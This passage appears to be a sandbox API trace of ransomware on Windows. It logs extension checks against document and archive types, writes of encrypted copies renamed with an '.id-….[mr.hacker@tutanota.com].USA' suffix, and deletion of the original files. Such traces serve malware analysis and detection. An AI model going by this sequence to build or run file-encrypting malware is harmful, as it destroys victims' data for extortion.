returned 1 [0265.384] lstrlenW (lpString=".bz2") returned 4 [0265.384] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.384] lstrlenW (lpString=".7z") returned 3 [0265.384] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.384] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.385] lstrlenW (lpString=".dbf") returned 4 [0265.385] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.385] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.385] lstrlenW (lpString=".1cd") returned 4 [0265.385] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0265.385] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0265.385] lstrlenW (lpString=".jpg") returned 4 [0265.385] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0265.385] lstrcmpiW (lpString1=".png", lpString2=".USA") returned -1 [0265.385] lstrlenW (lpString="16to9Squareframe_SelectionSubpicture.png") returned 40 [0265.385] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0265.385] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=3286) returned 1 [0265.385] CloseHandle (hObject=0x380) returned 1 [0265.385] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png")) returned 0x20 [0265.385] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.385] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.386] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0265.386] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0265.386] lstrlenW (lpString=".doc") returned 4 [0265.386] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0265.386] lstrlenW (lpString=".docx") returned 5 [0265.386] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0265.386] lstrlenW (lpString=".pdf") returned 4 [0265.386] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0265.386] lstrlenW (lpString=".xls") returned 4 [0265.386] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0265.386] lstrlenW (lpString=".xlsx") returned 5 [0265.386] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0265.386] lstrlenW (lpString=".ppt") returned 4 [0265.386] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0265.386] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0265.386] lstrlenW (lpString=".zip") returned 4 [0265.386] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0265.386] lstrlenW (lpString=".rar") returned 4 [0265.386] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0265.386] lstrlenW (lpString=".bz2") returned 4 [0265.386] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0265.386] lstrlenW (lpString=".7z") returned 3 [0265.386] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0265.387] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_SelectionSubpicture.png") returned 84 [0265.387] lstrlenW (lpString=".dbf") returned 4 [0265.387] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0265.402] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2739) returned 1 [0265.402] CloseHandle (hObject=0x380) returned 1 [0265.402] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png")) returned 0x20 [0265.402] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0265.402] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\BabyGirl\\16_9-frame-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\babygirl\\16_9-frame-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0265.937] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0265.938] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0267.561] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.561] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0267.981] GetLastError () returned 0x0 [0267.981] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xda6, lpOverlapped=0x0) returned 1 [0267.997] WriteFile (in: hFile=0x37c, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xdb0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xdb0, lpOverlapped=0x0) returned 1 [0267.998] ReadFile (in: hFile=0x380, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0267.998] WriteFile (in: hFile=0x37c, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.998] SetEndOfFile (hFile=0x37c) returned 1 [0267.998] CloseHandle (hObject=0x37c) returned 1 [0267.999] SetFilePointerEx (in: hFile=0x380, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0267.999] SetEndOfFile (hFile=0x380) returned 1 [0268.000] CloseHandle (hObject=0x380) returned 1 [0268.001] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.001] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01634_.wmf")) returned 1 [0268.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.001] lstrlenW (lpString=".doc") returned 4 [0268.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.001] lstrlenW (lpString=".docx") returned 5 [0268.001] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.001] lstrlenW (lpString=".pdf") returned 4 [0268.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.001] lstrlenW (lpString=".xls") returned 4 [0268.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.001] lstrlenW (lpString=".xlsx") returned 5 [0268.001] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.001] lstrlenW (lpString=".ppt") returned 4 [0268.001] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.001] lstrlenW (lpString=".zip") returned 4 [0268.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.001] lstrlenW (lpString=".rar") returned 4 [0268.001] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.001] lstrlenW (lpString=".bz2") returned 4 [0268.002] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString=".7z") returned 3 [0268.002] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.002] lstrlenW (lpString=".dbf") returned 4 [0268.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.002] lstrlenW (lpString=".1cd") returned 4 [0268.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.002] lstrlenW (lpString=".jpg") returned 4 [0268.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.002] lstrlenW (lpString=".doc") returned 4 [0268.002] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString=".docx") returned 5 [0268.002] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.002] lstrlenW (lpString=".pdf") returned 4 [0268.002] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString=".xls") returned 4 [0268.002] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.002] lstrlenW (lpString=".xlsx") returned 5 [0268.002] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.002] lstrlenW (lpString=".ppt") returned 4 [0268.002] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.002] lstrlenW (lpString=".zip") returned 4 [0268.002] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.002] lstrlenW (lpString=".rar") returned 4 [0268.002] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.003] lstrlenW (lpString=".bz2") returned 4 [0268.003] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.003] lstrlenW (lpString=".7z") returned 3 [0268.003] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.003] lstrlenW (lpString=".dbf") returned 4 [0268.003] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.003] lstrlenW (lpString=".1cd") returned 4 [0268.003] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01634_.WMF") returned 63 [0268.003] lstrlenW (lpString=".jpg") returned 4 [0268.003] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.003] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.003] lstrlenW (lpString="CUP.WMF") returned 7 [0268.003] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0268.017] GetFileSizeEx (in: hFile=0x380, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2966) returned 1 [0268.017] CloseHandle (hObject=0x380) returned 1 [0268.017] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 0x20 [0268.183] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.200] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.200] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.201] GetLastError () returned 0x0 [0268.201] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xb96, lpOverlapped=0x0) returned 1 [0268.206] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xba0, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xba0, lpOverlapped=0x0) returned 1 [0268.207] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.207] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xe2, lpOverlapped=0x0) returned 1 [0268.207] SetEndOfFile (hFile=0x2ac) returned 1 [0268.207] CloseHandle (hObject=0x2ac) returned 1 [0268.207] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.207] SetEndOfFile (hFile=0x384) returned 1 [0268.209] CloseHandle (hObject=0x384) returned 1 [0268.209] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.209] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\cup.wmf")) returned 1 [0268.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.209] lstrlenW (lpString=".doc") returned 4 [0268.209] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.209] lstrlenW (lpString=".docx") returned 5 [0268.209] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0268.210] lstrlenW (lpString=".pdf") returned 4 [0268.210] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.210] lstrlenW (lpString=".xls") returned 4 [0268.210] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.210] lstrlenW (lpString=".xlsx") returned 5 [0268.210] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0268.210] lstrlenW (lpString=".ppt") returned 4 [0268.210] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.210] lstrlenW (lpString=".zip") returned 4 [0268.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.210] lstrlenW (lpString=".rar") returned 4 [0268.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.210] lstrlenW (lpString=".bz2") returned 4 [0268.210] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.210] lstrlenW (lpString=".7z") returned 3 [0268.210] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.210] lstrlenW (lpString=".dbf") returned 4 [0268.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.210] lstrlenW (lpString=".1cd") returned 4 [0268.210] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.210] lstrlenW (lpString=".jpg") returned 4 [0268.210] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.211] lstrlenW (lpString=".doc") returned 4 [0268.211] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.211] lstrlenW (lpString=".docx") returned 5 [0268.211] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0268.211] lstrlenW (lpString=".pdf") returned 4 [0268.211] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.211] lstrlenW (lpString=".xls") returned 4 [0268.211] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.211] lstrlenW (lpString=".xlsx") returned 5 [0268.211] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0268.211] lstrlenW (lpString=".ppt") returned 4 [0268.211] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.211] lstrlenW (lpString=".zip") returned 4 [0268.211] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.211] lstrlenW (lpString=".rar") returned 4 [0268.211] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.211] lstrlenW (lpString=".bz2") returned 4 [0268.211] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.212] lstrlenW (lpString=".7z") returned 3 [0268.212] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.212] lstrlenW (lpString=".dbf") returned 4 [0268.212] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.212] lstrlenW (lpString=".1cd") returned 4 [0268.212] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.212] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUP.WMF") returned 58 [0268.212] lstrlenW (lpString=".jpg") returned 4 [0268.212] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.212] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.212] lstrlenW (lpString="DD00256_.WMF") returned 12 [0268.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.213] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2fbff1c | out: lpFileSize=0x2fbff1c*=2832) returned 1 [0268.213] CloseHandle (hObject=0x384) returned 1 [0268.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 0x20 [0268.213] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.213] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.213] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0268.213] GetLastError () returned 0x0 [0268.214] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0xb10, lpOverlapped=0x0) returned 1 [0268.215] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xb20, lpOverlapped=0x0) returned 1 [0268.216] ReadFile (in: hFile=0x384, lpBuffer=0x3bd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fbfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesRead=0x2fbfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.216] WriteFile (in: hFile=0x2ac, lpBuffer=0x3bd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fbfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bd0020*, lpNumberOfBytesWritten=0x2fbfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.216] SetEndOfFile (hFile=0x2ac) returned 1 [0268.216] CloseHandle (hObject=0x2ac) returned 1 [0268.216] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fbfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.216] SetEndOfFile (hFile=0x384) returned 1 [0268.218] CloseHandle (hObject=0x384) returned 1 [0268.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.218] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00256_.wmf")) returned 1 [0268.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 63 [0268.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00256_.WMF") 